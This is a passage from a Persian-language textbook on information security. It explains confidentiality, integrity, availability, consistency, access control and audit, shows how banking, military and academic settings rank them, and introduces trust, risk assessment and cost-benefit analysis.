ﻛﻪ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﺩﺍﺭﻧﺪ ﻧﺎﻣﻴﺪ.
ﺩﺭ ﺍﻳﻦ ﺗﻌﺮﻳﻒ ﮔﺴﺘﺮﺩﻩ ،ﮔﻮﻧﻪﻫـﺎﻱ ﻣﺨﺘﻠﻔـﻲ ﺍﺯ ﺍﻣﻨﻴـﺖ ﻭﺟـﻮﺩ
٧١
ﺩﺍﺭﻧﺪ ﻛﻪ ﺭﺍﻫﺒﺮﺍﻥ ﻭ ﻛﺎﺭﺑﺮﺍﻥ ﺑﺎﻳﺪ ﺑﻪ ﺁﻧﻬﺎ ﺗﻮﺟﻪ ﻛﻨﻨﺪ:
ﻛﻨﺘﺮﻝ
ﻣﺤﺮﻣﺎﻧﮕﻲ
٧٢
ﺣﻔﺎﻇﺖ ﺍﺯ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﻣﻘﺎﺑﻞ ﺧﻮﺍﻧﺪﻩﺷﺪﻥ ﻳـﺎ ﻧـﺴﺨﻪﺑـﺮﺩﺍﺭﻱ
ﺗﻮﺳـﻂ ﺍﺷﺨﺎﺻـﻲ ﻛـﻪ ﺍﺯ ﺟﺎﻧـﺐ ﻣﺎﻟـﻚ ﺁﻥ ﺍﻃﻼﻋـﺎﺕ ﻣﺠــﻮﺯ
ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺁﻧﺮﺍ ﻧﺪﺍﺭﻧﺪ .ﺍﻳﻦ ﮔﻮﻧﺔ ﺍﻣﻨﻴﺖ ﻧﻪﺗﻨﻬﺎ ﺣﻔﺎﻇﺖ ﻛﻠﻲ ﺍﺯ
ﺍﻃﻼﻋﺎﺕ ﺭﺍ ﺩﺭ ﺑﺮ ﻣﻲﮔﻴﺮﺩ ،ﺑﻠﻜﻪ ﺣﻔﺎﻇـﺖ ﺍﺯ ﺩﺍﺩﻩﻫـﺎﻱ ﻣﻨﻔـﺮﺩ
ﻱ ﺧﻮﺩ ﺁﺳﻴﺒﻲ ﺩﺭ ﭘـﻲ ﻧﺪﺍﺷـﺘﻪ ﺑﺎﺷـﻨﺪ
ﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﻪ ﺧﻮﺩ ﹺ
ﻭﻟﻲ ﺍﺯ ﻃﺮﻳﻖ ﺗﻌﺪﺍﺩﻱ ﺍﺯ ﺁﻧﻬﺎ ﺑﺘﻮﺍﻥ ﺑﻪ ﺍﻃﻼﻋﺎﺕ ﻣﺤﺮﻣﺎﻧـﻪ ﭘـﻲ
ﺑﺮﺩ ﺭﺍ ﻧﻴﺰ ﺷﺎﻣﻞ ﻣﻲﺷﻮﺩ.
٧٣
ﻳﻜﭙﺎﺭﭼﮕﻲ ﻭ ﺻﺤﺖ )ﺗﻤﺎﻣﻴﺖ(
ﻣﺤﺎﻓﻈﺖ ﺍﺯ ﺍﻃﻼﻋﺎﺕ )ﻣﻨﺠﻤﻠﻪ ﺑﺮﻧﺎﻣﻪﻫﺎ( ﺩﺭ ﻣﻘﺎﺑﻞ ﻫﺮﮔﻮﻧﻪ ﺣﺬﻑ
ﻭ ﺗﻐﻴﻴﺮ ﺑﺪﻭﻥ ﺍﺟﺎﺯﺓ ﻣﺎﻟﻚ ﺁﻥ ﺍﻃﻼﻋـﺎﺕ .ﺍﻃﻼﻋـﺎﺗﻲ ﻛـﻪ ﺑﺎﻳـﺪ
ﻣﻮﺭﺩ ﻣﺤﺎﻓﻈﺖ ﻗﺮﺍﺭ ﮔﻴﺮﺩ ﺷﺎﻣﻞ ﺳﻮﺍﺑﻖ ﺣﺴﺎﺑﺪﺍﺭﻱ ،ﻧﺴﺨﻪﻫﺎﻱ
ﭘﺸﺘﻴﺒﺎﻥ ،ﺯﻣﺎﻧﻬﺎﻱ ﺍﻳﺠﺎﺩ ﻓﺎﻳﻞ ﻭ ﺍﺳﻨﺎﺩ ﻣﻲﺷﻮﺩ.
ﺩﺭ ﺩﺳﺘﺮﺱ ﺑﻮﺩﻥ
٧٤
ﺣﻔﺎﻇﺖ ﺍﺯ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺧﺪﻣﺎﺗﻲ ﺑﮕﻮﻧـﻪﺍﻱ ﻛـﻪ ﺑـﺪﻭﻥ ﺗـﺼﺪﻳﻖ
ﺍﻋﺘﺒﺎﺭ ﺗﻨﺰﻝ ﭘﻴﺪﺍ ﻧﻜﻨﻨﺪ ﻭ ﺗﺨﺮﻳﺐ ﻧﺸﻮﻧﺪ .ﺍﮔـﺮ ﻫﻨﮕﺎﻣﻴﻜـﻪ ﻳـﻚ
ﻛﺎﺭﺑ ﹺﺮ ﻣﺠﺎﺯ ﺑﻪ ﺍﻃﻼﻋﺎﺕ ﻧﻴﺎﺯ ﺩﺍﺭﺩ ﺳﻴﺴﺘﻢ ﻭ ﺩﺍﺩﻩﻫﺎ ﺩﺭ ﺩﺳﺘﺮﺱ
ﻧﺒﺎﺷﻨﺪ ،ﻧﺘﻴﺠﻪ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻪ ﺍﻧﺪﺍﺯﺓ ﺯﻣﺎﻧﻲ ﻛـﻪ ﺍﻃﻼﻋـﺎﺕ ﺍﺯ ﺭﻭﻱ
ﺳﻴﺴﺘﻢ ﺣﺬﻑ ﺷﺪﻩﺍﻧﺪ ﻧﺎﺧﻮﺷﺎﻳﻨﺪ ﺑﺎﺷﺪ.
٧٥
ﺛﺒﺎﺕ ﻭ ﺳﺎﺯﮔﺎﺭﻱ )ﭘﺎﻳﺪﺍﺭﻱ(
ﺣﺼﻮﻝ ﺍﻃﻤﻴﻨﺎﻥ ﺍﺯ ﺍﻳﻨﻜﻪ ﺳﻴﺴﺘﻢ ﺑﮕﻮﻧـﻪﺍﻱ ﻛـﻪ ﻣـﻮﺭﺩ ﺍﻧﺘﻈـﺎﺭ
ﻛﺎﺭﺑﺮﺍﻥ ﺍﺳﺖ ﺭﻓﺘﺎﺭ ﻣﻲﻛﻨﺪ .ﺍﮔﺮ ﻧﺮﻡﺍﻓﺰﺍﺭ ﻳﺎ ﺳﺨﺖﺍﻓﺰﺍﺭ ﻧﺎﮔﻬـﺎﻥ
ﺑﮕﻮﻧﻪﺍﻱ ﺑﺴﻴﺎﺭ ﻣﺘﻔﺎﻭﺕ ﺍﺯ ﻗﺒﻞ ﻋﻤﻞ ﻛﻨـﺪ -ﺧـﺼﻮﺻﹰﺎ ﺑﻌـﺪ ﺍﺯ
ﻳﻚ ﺍﺭﺗﻘﺎ ﻳﺎ ﺭﻓﻊ ﺍﺷﻜﺎﻝ -ﻣﺸﻜﻼﺕ ﺯﻳﺎﺩﻱ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﺭﺥ
ﺩﻫﺪ .ﺗﺼﻮﺭ ﻛﻨﻴﺪ ﺍﮔﺮ ﻓﺮﻣﺎﻥ " "lsﺑﻄـﻮﺭ ﺗـﺼﺎﺩﻓﻲ ﺣـﺬﻑ ﺷـﻮﺩ
ﻫﻨﮕﺎﻡ ﻓﻬﺮﺳﺖﮔﻴﺮﻱ ﺍﺯ ﻓﺎﻳﻠﻬﺎ ﭼﻪ ﺍﺗﻔﺎﻗﻲ ﻣﻲﺍﻓﺘـﺪ! ﺍﻳـﻦ ﮔﻮﻧـﺔ
ﺍﻣﻨﻴﺖ ﺭﺍ ﻣﻲﺗﻮﺍﻥ ﺍﻃﻤﻴﻨﺎﻥ ﺍﺯ ﺻﺤﺖ ﺩﺍﺩﻩﻫـﺎ ﻭ ﻧـﺮﻡﺍﻓﺰﺍﺭﻫـﺎﻳﻲ
۷۱
ﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ ﺑﻪ ﺭﻭﻳﻜﺮﺩ COBITﺩﺭ ﺭﺍﻫﺒﺮﺩﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ:
http://www.isaca.org/cobit.htm
Confidentiality
Integrity
Availability
Consistency
72
73
74
75
ﺿﺎﺑﻄﻪﻣﻨﺪ ﻛﺮﺩﻥ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺳﻴﺴﺘﻢ .ﺍﮔﺮ ﺍﻓﺮﺍﺩ )ﻳﺎ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ(
ﻧﺎﺷـﻨﺎﺧﺘﻪ ﻭ ﻏﻴﺮﻣﺠـﺎﺯ ﺩﺭ ﺳﻴـﺴﺘﻢ ﺷــﻤﺎ ﻭﺟـﻮﺩ ﺩﺍﺷـﺘﻪ ﺑﺎﺷــﻨﺪ
ﻣﻲﺗﻮﺍﻧﻨﺪ ﺩﺭﺩﺳﺮﻫﺎﻱ ﺯﻳﺎﺩﻱ ﺑﻴﺎﻓﺮﻳﻨﻨﺪ ﻭ ﺷﻤﺎ ﺭﺍﺟﻊ ﺑﻪ ﭼﮕﻮﻧﮕﻲ
ﻭﺭﻭﺩ ﺁﻧﻬﺎ ،ﺁﻧﭽﻪ ﻛﻪ ﻣﻤﻜﻦ ﺍﺳـﺖ ﺍﻧﺠـﺎﻡ ﺩﺍﺩﻩ ﺑﺎﺷـﻨﺪ ،ﻭ ﺍﻓـﺮﺍﺩ
ﻻ ﺑﻪ ﺳﻴﺴﺘﻢ ﺷﻤﺎ ﺩﺳﺘﺮﺳﻲ ﺩﺍﺷﺘﻪﺍﻧﺪ ﺍﺣﺴﺎﺱ
ﺩﻳﮕﺮﻱ ﻛﻪ ﺍﺣﺘﻤﺎ ﹰ
ﻧﮕﺮﺍﻧﻲ ﻣﻲﻛﻨﻴﺪ .ﺟﺒـﺮﺍﻥ ﭼﻨـﻴﻦ ﻣـﺸﻜﻼﺗﻲ ﻣـﻲﺗﻮﺍﻧـﺪ ﺑـﺴﻴﺎﺭ
ﻭﻗﺘﮕﻴﺮ ﻭ ﭘﺮﻫﺰﻳﻨﻪ ﺑﺎﺷﺪ .ﺷﺎﻳﺪ ﻣﺠﺒﻮﺭ ﺷﻮﻳﺪ ﺳﻴـﺴﺘﻢ ﺧـﻮﺩ ﺭﺍ ﺍﺯ
ﺍﺑﺘﺪﺍ ﻧﺼﺐ ﻭ ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﻛﻨﻴﺪ ﻭ ﺗـﺎﺯﻩ ﻣﺘﻮﺟـﻪ ﺷـﻮﻳﺪ ﻛـﻪ ﺗﻐﻴﻴـﺮ
ﻣﻬﻤﻲ ﺭﺥ ﻧﺪﺍﺩﻩ -ﺣﺘﻲ ﺍﮔﺮ ﻭﺍﻗﻌﹰﺎ ﻫﻴﭻ ﺍﺗﻔﺎﻗﻲ ﻧﻴﺎﻓﺘﺎﺩﻩ ﺑﺎﺷﺪ.
ﺑﺎﺯﺑﻴﻨﻲ
ﺑﻪ ﻫﻤﺎﻥ ﻣﻴﺰﺍﻥ ﻛﻪ ﻧﮕﺮﺍﻥ ﺩﺳﺘﺮﺳﻲ ﺍﻓﺮﺍﺩ ﻏﻴﺮﻣﺠﺎﺯ ﺑﻪ ﺳﻴـﺴﺘﻢ
ﻫﺴﺘﻴﺪ ،ﺑﺎﻳـﺪ ﺑـﻪ ﺍﻣﻜـﺎﻥ ﻭﻗـﻮﻉ ﺍﺷـﺘﺒﺎﻫﺎﺕ ﻳـﺎ ﺍﻧﺠـﺎﻡ ﺍﻋﻤـﺎﻝ
ﺑﺪﺧﻮﺍﻫﺎﻧﻪ ﺗﻮﺳﻂ ﻛـﺎﺭﺑﺮﺍﻥ ﻣﺠـﺎﺯ ﻧﻴـﺰ ﺗﻮﺟـﻪ ﻛﻨﻴـﺪ .ﺩﺭ ﭼﻨـﻴﻦ
ﺷﺮﺍﻳﻄﻲ ﺑﺎﻳﺪ ﺁﻧﭽﻪ ﻛﻪ ﺍﻧﺠﺎﻡ ﺷﺪﻩ ،ﻓﺮﺩ ﺍﻧﺠﺎﻡﺩﻫﻨﺪﻩ ﻭ ﺗـﺄﺛﻴﺮﺍﺕ
ﺁﻧﺮﺍ ﻣﺸﺨﺺ ﻧﻤﺎﻳﻴﺪ .ﺗﻨﻬﺎ ﺭﺍﻩ ﻣﻄﻤﺌﻦ ﺑﺮﺍﻱ ﺩﺳـﺘﻴﺎﺑﻲ ﺑـﻪ ﺍﻳـﻦ
ﻧﺘﺎﻳﺞ ،ﺩﺍﺷﺘﻦ ﺳﻮﺍﺑﻖ ﻭ ﺛﺒﺘﻬﺎﻱ ﺗﺨﺮﻳـﺐﻧـﺸﺪﻧﻲ ﺍﺯ ﻓﻌﺎﻟﻴﺘﻬـﺎ ﺩﺭ
ﺳﻴﺴﺘﻢ ﺍﺳﺖ ﻛﻪ ﻣﻲﺗﻮﺍﻧﺪ ﺍﻓـﺮﺍﺩ ﻭ ﻋﻤﻠﻜـﺮﺩ ﺁﻧﻬـﺎ ﺭﺍ ﺷﻨﺎﺳـﺎﻳﻲ
ﻛﻨﺪ .ﺩﺭ ﺑﺮﺧﻲ ﺍﺯ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺑﺴﻴﺎﺭ ﺣـﺴﺎﺱ ،ﺷـﻴﻮﺓ ﺑـﺎﺯﺑﻴﻨﻲ
ﻣﻤﻜﻦ ﺍﺳﺖ ﺁﻧﻘﺪﺭ ﮔـﺴﺘﺮﺩﻩ ﺑﺎﺷـﺪ ﻛـﻪ ﺑﺘﻮﺍﻧـﺪ ﺑﻌـﺪ ﺍﺯ ﺗﻨﻈـﻴﻢ
ﻭﺿﻌﻴﺖ ﺳﻴﺴﺘﻢ ﺑـﻪ ﻳـﻚ ﺣﺎﻟـﺖ ﺟﺪﻳـﺪ ،ﺍﺟـﺎﺯﺓ ﺑﺎﺯﮔـﺸﺖ ﺑـﻪ
ﻭﺿﻌﻴﺖ ﺍﻭﻟﻴﻪ ﺭﺍ ﻧﻴﺰ ﺑﺪﻫﺪ.
ﺍﮔﺮﭼﻪ ﻛﻠﻴﺔ ﺍﻳﻦ ﻭﺟﻮﻩ ﺍﻣﻨﻴﺘﻲ ﺍﻫﻤﻴـﺖ ﺩﺍﺭﻧـﺪ ،ﺍﻣـﺎ ﺳـﺎﺯﻣﺎﻧﻬﺎﻱ
ﻣﺨﺘﻠﻒ ﺑﻪ ﻫﺮﻳﻚ ﺑﺎ ﺩﺭﺟﺔ ﺍﻫﻤﻴﺖ ﻣﺘﻔـﺎﻭﺗﻲ ﻣـﻲﻧﮕﺮﻧـﺪ .ﺍﻳـﻦ
ﺍﺧﺘﻼﻑ ﺑﺪﻟﻴﻞ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﻫـﺮ ﺳـﺎﺯﻣﺎﻥ ﻣﻼﺣﻈـﺎﺕ ﺍﻣﻨﻴﺘـﻲ
ﺧﺎﺹ ﺧﻮﺩ ﺭﺍ ﺩﺍﺭﺩ ﻭ ﺑﺎﻳـﺪ ﺍﻭﻟﻮﻳﺘﻬـﺎ ﻭ ﺳﻴﺎﺳـﺘﻬﺎﻱ ﺧـﻮﺩ ﺭﺍ ﺑـﺮ
ﺣﺴﺐ ﺁﻥ ﻣﻼﺣﻈﺎﺕ ﺗﻌﻴﻴﻦ ﻛﻨﺪ .ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ:
ﻣﺤﻴﻂ ﺑﺎﻧﻜﺪﺍﺭﻱ
ﺩﺭ ﭼﻨﻴﻦ ﻣﺤﻴﻄﻲ ،ﻳﻜﭙـﺎﺭﭼﮕﻲ ،ﻛﻨﺘـﺮﻝ ،ﻭ ﺑـﺎﺯﺑﻴﻨﻲ ،ﺍﺯ ﺍﺻـﻮﻝ
ﺑﺴﻴﺎﺭ ﻣﻬﻢ ﻭ ﺣﻴﺎﺗﻲ ﻫﺴﺘﻨﺪ؛ ﻭ ﻣﺤﺮﻣﺎﻧﮕﻲ ﻭ ﺩﺭ ﺩﺳﺘﺮﺱ ﺑـﻮﺩﻥ
ﺩﺭ ﺩﺭﺟﺔ ﺑﻌﺪﻱ ﻗﺮﺍﺭ ﺩﺍﺭﻧﺪ.
ﻣﺤﻴﻂ ﻧﻈﺎﻣﻲ
ﺩﺭ ﻳــﻚ ﺳﻴــﺴﺘﻢ ﺩﻓــﺎﻋﻲ ﻣﻠــﻲ ﻛــﻪ ﺣــﺎﻭﻱ ﺍﻃﻼﻋــﺎﺕ
ﻃﺒﻘﻪﺑﻨﺪﻱﺷﺪﻩ ﺍﺳﺖ ،ﻣﺤﺮﻣﺎﻧﮕﻲ ﺩﺭ ﺍﻭﻟﻴﻦ ﺩﺭﺟﺔ ﺍﻫﻤﻴـﺖ ﻗـﺮﺍﺭ
١٤٧
ﺑﺨﺶ ﺳﻮﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ
ﺩﺍﺭﺩ ﻭ ﺩﺭ ﺩﺳﺘﺮﺱ ﺑﻮﺩﻥ ﺩﺭ ﺩﺭﺟﺔ ﺁﺧﺮ .ﺩﺭ ﺑﺮﺧﻲ ﺍﺯ ﻣﺤﻴﻄﻬﺎﻱ
ﺑﺴﻴﺎﺭ ﻃﺒﻘﻪﺑﻨﺪﻱ ﺷﺪﻩ ﻣﻤﻜﻦ ﺍﺳـﺖ ﻣﻘﺎﻣـﺎﺕ ﺭﺳـﻤﻲ ﺗـﺮﺟﻴﺢ
ﺩﻫﻨﺪ ﻛﻪ ﻳﻚ ﺳﺎﺧﺘﻤﺎﻥ ﺭﺍ ﻣﻨﻔﺠﺮ ﻛﻨﻨﺪ ﺗﺎ ﺍﺟـﺎﺯﻩ ﻧـﺪﺍﺩﻩ ﺑﺎﺷـﻨﺪ
ﺍﻃﻼﻋﺖ ﺑﺪﺳﺖ ﻣﻬﺎﺟﻤﻴﻦ ﺑﻴﺎﻓﺘﺪ.
ﻣﺤﻴﻂ ﺩﺍﻧﺸﮕﺎﻫﻲ
ﺩﺭ ﭼﻨﻴﻦ ﻣﺤﻴﻄﻲ ،ﻳﻜﭙﺎﺭﭼﮕﻲ ﻭ ﺩﺭ ﺩﺳﺘﺮﺱ ﺑـﻮﺩﻥ ﺍﻃﻼﻋـﺎﺕ
ﻣﻬﻤﺘﺮﻳﻦ ﻧﻴﺎﺯﻣﻨﺪﻳﻬﺎ ﻫﺴﺘﻨﺪ .ﺣﺼﻮﻝ ﺍﻃﻤﻴﻨـﺎﻥ ﺍﺯ ﺩﺭ ﺩﺳـﺘﺮﺱ
ﺑﻮﺩﻥ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﺯﻣﺎﻧﻴﻜﻪ ﺩﺍﻧﺸﺠﻮﻳﺎﻥ ﺑﻪ ﺁﻧﻬﺎ ﻧﻴـﺎﺯ ﺩﺍﺭﻧـﺪ ﺑـﻪ
ﻣﺮﺍﺗﺐ ﻣﻬﻤﺘﺮ ﺍﺯ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺭﺍﻫﺒﺮﺍﻥ ﺑﺘﻮﺍﻧﻨـﺪ ﺯﻣـﺎﻥ ﺍﺳـﺘﻔﺎﺩﺓ
ﺩﺍﻧﺸﺠﻮﻳﺎﻥ ﺍﺯ ﺣﺴﺎﺑﻬﺎﻱ ﻛﺎﺭﺑﺮﻱ ﺧﻮﺩ ﺭﺍ ﺗﺸﺨﻴﺺ ﺩﻫﻨﺪ.
ﺍﻋﺘﻤﺎﺩ
ﻻ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺭﺍ ﺑـﺎ ﻋﻨـﺎﻭﻳﻦ
ﻣﺘﺨﺼﺼﻴﻦ ﺍﻣﻨﻴﺖ ﻣﻌﻤﻮ ﹰ
"ﺍﻣﻦ" ﻭ "ﻧﺎﺍﻣﻦ" ﺧﻄﺎﺏ ﻧﻤﻲﻛﻨﻨﺪ؛ ﺑﻠﻜﻪ ﻛﻠﻤﺔ "ﺍﻋﺘﻤـﺎﺩ" ﺭﺍ ﺑـﺮﺍﻱ
ﺗﻮﺿﻴﺢ ﺳﻄﺢ ﺍﻃﻤﻴﻨﺎﻥ ﻣﻮﺭﺩ ﺍﻧﺘﻈﺎﺭ ﺍﺯ ﻳـﻚ ﺳﻴـﺴﺘﻢ ﺭﺍﻳﺎﻧـﻪﺍﻱ
ﺑﻜﺎﺭ ﻣﻲﺑﺮﻧﺪ .ﺩﻟﻴﻞ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺍﻳـﻦ ﺍﺳـﺖ ﻛـﻪ ﺍﻣﻨﻴـﺖ ﻣﻄﻠـﻖ
ﻫﻴﭽﮕﺎﻩ ﻧﻤﻲﺗﻮﺍﻧﺪ ﺑﺪﺳﺖ ﺁﻳﺪ .ﺗﻨﻬﺎ ﻣﻲﺗﻮﺍﻧﻴﻢ ﺑﺎ ﺍﻳﺠـﺎﺩ ﺍﻋﺘﻤـﺎﺩ
ﻛــﺎﻓﻲ ﺩﺭ ﭘﻴﻜﺮﺑﻨــﺪﻱ ﻛﻠــﻲ ﻭ ﺗــﻀﻤﻴﻦ ﺍﺳــﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻥ ﺑــﺮﺍﻱ
ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻣﻮﺭﺩ ﻧﻈﺮ ﺑﻪ ﺍﻣﻨﻴﺖ ﻣﻄﻠﻖ ﻧﺰﺩﻳـﻚ ﺷـﻮﻳﻢ .ﺍﻳﺠـﺎﺩ
ﺍﻋﺘﻤــﺎﺩ ﻛــﺎﻓﻲ ﺩﺭ ﺳﻴــﺴﺘﻤﻬﺎﻱ ﺭﺍﻳﺎﻧــﻪﺍﻱ ﻣــﺴﺘﻠﺰﻡ ﺗﻔﻜــﺮ ﻭ
ﺑﺮﻧﺎﻣﻪﺭﻳـﺰﻱ ﺩﻗﻴـﻖ ﺍﺳـﺖ .ﺗـﺼﻤﻴﻤﺎﺕ ﻋﻤﻠﻴـﺎﺗﻲ ﻭ ﺩﺭﺻـﻮﺭﺕ
ﺍﻣﻜﺎﻥ ﺳﻴﺎﺳﺘﻬﺎﻱ ﻛﻠﻲ ﺑﺎﻳﺪ ﺑﺮ ﺍﺳﺎﺱ ﺍﺭﺯﻳﺎﺑﻲ ﻣﺨـﺎﻃﺮﻩ ﺍﺗﺨـﺎﺫ
ﮔﺮﺩﻧﺪ ﻭ ﺑﺮﺍﻱ ﺍﻳﻦ ﻣﻨﻈﻮﺭ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﺗﻮﺻـﻴﻪﻫـﺎﻱ ﺗﺨﺼـﺼﻲ
ﺑﺴﻴﺎﺭ ﺣﺎﺋﺰ ﺍﻫﻤﻴﺖ ﺍﺳﺖ:
ﺍﮔﺮ ﺷﻤﺎ ﺩﺭ ﻳﻚ ﺷﺮﻛﺖ ،ﺩﺍﻧﺸﮕﺎﻩ ﻳﺎ ﺳﺎﺯﻣﺎﻥ ﺩﻭﻟﺘﻲ ﺑﺰﺭﮔﺘﺮ ﻛﺎﺭ
ﻣﻲﻛﻨﻴﺪ ،ﭘﻴﺸﻨﻬﺎﺩ ﻣﻲﻛﻨﻴﻢ ﻛﻪ ﺑﺎ ﺑﺨﺸﻬﺎﻱ ﻣﻤﻴﺰﻱ ﺩﺍﺧﻠـﻲ ﻳـﺎ
ﻣﺪﻳﺮﻳﺖ ﻣﺨﺎﻃﺮﺓ ﺷﺮﻛﺖ ﺑﺮﺍﻱ ﺩﺭﻳﺎﻓﺖ ﻛﻤﻜﻬﺎﻱ ﻻﺯﻡ ﺍﺭﺗﺒـﺎﻁ
ﺑﺮﻗﺮﺍﺭ ﻧﻤﺎﻳﻴﺪ )ﺁﻧﻬﺎ ﻣﻤﻜﻦ ﺍﺳﺖ ﺍﺯ ﻃﺮﺣﻬﺎ ﻭ ﺳﻴﺎﺳﺘﻬﺎﻳﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ ﻛﻪ
ﻻﺯﻡ ﺑﺎﺷﺪ ﺍﺯ ﺁﻧﻬﺎ ﻣﻄﻠﻊ ﺷﻮﻳﺪ( .ﻫﻤﭽﻨﻴﻦ ﻣﻲﺗﻮﺍﻧﻴـﺪ ﺑـﺎ ﻣﺮﺍﺟﻌـﻪ ﺑـﻪ
ﻣﻨﺎﺑﻊ ﻣﻌﺮﻓﻲﺷﺪﻩ ﺩﺭ ﺑﺨﺶ ﺿﻤﺎﺋﻢ ،ﺩﺭ ﺧﺼﻮﺹ ﺍﻳـﻦ ﻣﻮﺿـﻮﻉ
ﻣﻄﺎﻟــﺐ ﺑﻴـﺸﺘﺮﻱ ﺑﻴﺎﻣﻮﺯﻳـﺪ .ﻣﻤﻜــﻦ ﺍﺳــﺖ ﺑﺨﻮﺍﻫﻴــﺪ ﺍﺯ ﻳــﻚ
ﻣﺆﺳﺴﺔ ﻣﺸﺎﻭﺭ ﻃﻠﺐ ﻫﻤﻜﺎﺭﻱ ﻛﻨﻴﺪ .ﺑﻌﻨﻮﺍﻥ ﻣﺜـﺎﻝ ﺑـﺴﻴﺎﺭﻱ ﺍﺯ
ﺍﮔﺮ ﺷﻤﺎ ﺑﺎ ﻳﻚ ﺷـﺮﻛﺖ ﻛـﻮﭼﻜﺘﺮ ﻫﻤﻜـﺎﺭﻱ ﻣـﻲﻛﻨﻴـﺪ ﻳـﺎ ﺑـﺎ
ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺷﺨﺼﻲ ﺳﺮ ﻭ ﻛﺎﺭ ﺩﺍﺭﻳﺪ ،ﻣﻤﻜﻦ ﺍﺳﺖ ﺩﺍﺭﺍﻱ ﺑﺨﺶ
ﺗﺨﺼﺼﻲ ﺍﻣﻨﻴﺖ ﻧﺒﺎﺷﻴﺪ .ﺩﺭ ﺍﻳﻨﺤﺎﻟﺖ ﭘﻴﺸﻨﻬﺎﺩ ﻣﻲﺷـﻮﺩ ﺑﺨـﺶ
ﺩﻭﻡ ﻛﺘﺎﺏ ﺭﺍ ﺑﻪ ﺩﻗﺖ ﻣﻄﺎﻟﻌﻪ ﻧﻤﺎﻳﻴﺪ .ﻣﻤﻜﻦ ﺍﺳﺖ ﺗﺼﻮﺭ ﻛﻨﻴـﺪ
ﻛﻪ ﺍﻳﻦ ﻛﺘﺎﺏ ﺑﻴﺶ ﺍﺯ ﻣﻴﺰﺍﻥ ﺍﺣﺘﻴﺎﺝ ﺷﻤﺎ ﻭﺍﺭﺩ ﺟﺰﺋﻴﺎﺕ ﺷﺪﻩ ،ﺍﻣﺎ
ﺍﻃﻼﻋﺎﺕ ﻣﻮﺟﻮﺩ ﺩﺭ ﺍﻳﻦ ﻓﺼﻮﻝ ﺑﻪ ﺷﻤﺎ ﺩﺭ ﺗﻨﻈﻴﻢ ﺍﻭﻟﻮﻳﺘﻬﺎﻳﺘﺎﻥ
ﻛﻤﻚ ﺷﺎﻳﺎﻧﻲ ﺧﻮﺍﻫﺪ ﻛﺮﺩ.
ﺗﺤﻠﻴﻞ ﺳﻮﺩ ﻭ ﺯﻳﺎﻥ ﻭ ﺍﻟﮕﻮﻫﺎﻱ ﺳﺮﺁﻣﺪﻱ
ﺑﻌﺪ ﺍﺯ ﺍﺗﻤﺎﻡ ﺍﺭﺯﻳﺎﺑﻲ ﻣﺨﺎﻃﺮﻩ ،ﻓﻬﺮﺳﺘﻲ ﻃﻮﻻﻧﻲ ﺍﺯ ﻣﺨﺎﻃﺮﺍﺕ ﺭﺍ
ﭘﻴﺶ ﺭﻭﻱ ﺧﻮﺩ ﺩﺍﺭﻳﺪ -ﺑﺴﻴﺎﺭ ﺑﻴﺶ ﺍﺯ ﻣﻘﺪﺍﺭﻱ ﻛﻪ ﺑﺘﻮﺍﻧﻴـﺪ ﺑـﻪ
ﻫﻤﺔ ﺁﻧﻬﺎ ﺑﭙﺮﺩﺍﺯﻳﺪ ﻳﺎ ﺑﺎ ﺗﻤﺎﻡ ﺁﻧﻬﺎ ﻣﻘﺎﺑﻠـﻪ ﻛﻨﻴـﺪ .ﭼـﻮﻥ ﺯﻣـﺎﻥ ﻭ
ﭘﻮﻝ ﻣﺤﺪﻭﺩ ﻫﺴﺘﻨﺪ ،ﺍﻛﻨﻮﻥ ﺷـﻤﺎ ﺑـﻪ ﻳـﻚ ﺭﻭﺵ ﺩﺭﺟـﻪﺑﻨـﺪﻱ
ﺑﺮﺍﻱ ﺍﻳﻦ ﻣﺨﺎﻃﺮﺍﺕ ﻧﻴﺎﺯ ﺩﺍﺭﻳﺪ ﺗﺎ ﺑﺘﻮﺍﻧﻴﺪ ﺗـﺼﻤﻴﻢ ﺑﮕﻴﺮﻳـﺪ ﻛـﻪ
ﻣﻲﺧﻮﺍﻫﻴﺪ ﺁﺛﺎﺭ ﻭ ﺍﺣﺘﻤﺎﻝ ﻛﺪﺍﻡ ﻣﺨﺎﻃﺮﺍﺕ ﺭﺍ ﺍﺯ ﻃﺮﻳﻖ ﺍﺑﺰﺍﺭﻫﺎﻱ
ﻓﻨﻲ ﻛﺎﻫﺶ ﺩﻫﻴﺪ ،ﺩﺭ ﻣﻘﺎﺑﻞ ﻛﺪﺍﻣﻬﺎ ﺍﺯ ﺑﻴﻤﻪ ﺍﺳـﺘﻔﺎﺩﻩ ﻛﻨﻴـﺪ ،ﻭ
ﻭﻗﻮﻉ ﭼﻪ ﻣﻮﺍﺭﺩﻱ ﺭﺍ ﺻﺮﻓﹰﺎ ﺑﭙﺬﻳﺮﻳﺪ .ﺑﻄﻮﺭ ﺳﻨﺘﻲ ﺗﺼﻤﻴﻢﮔﻴـﺮﻱ
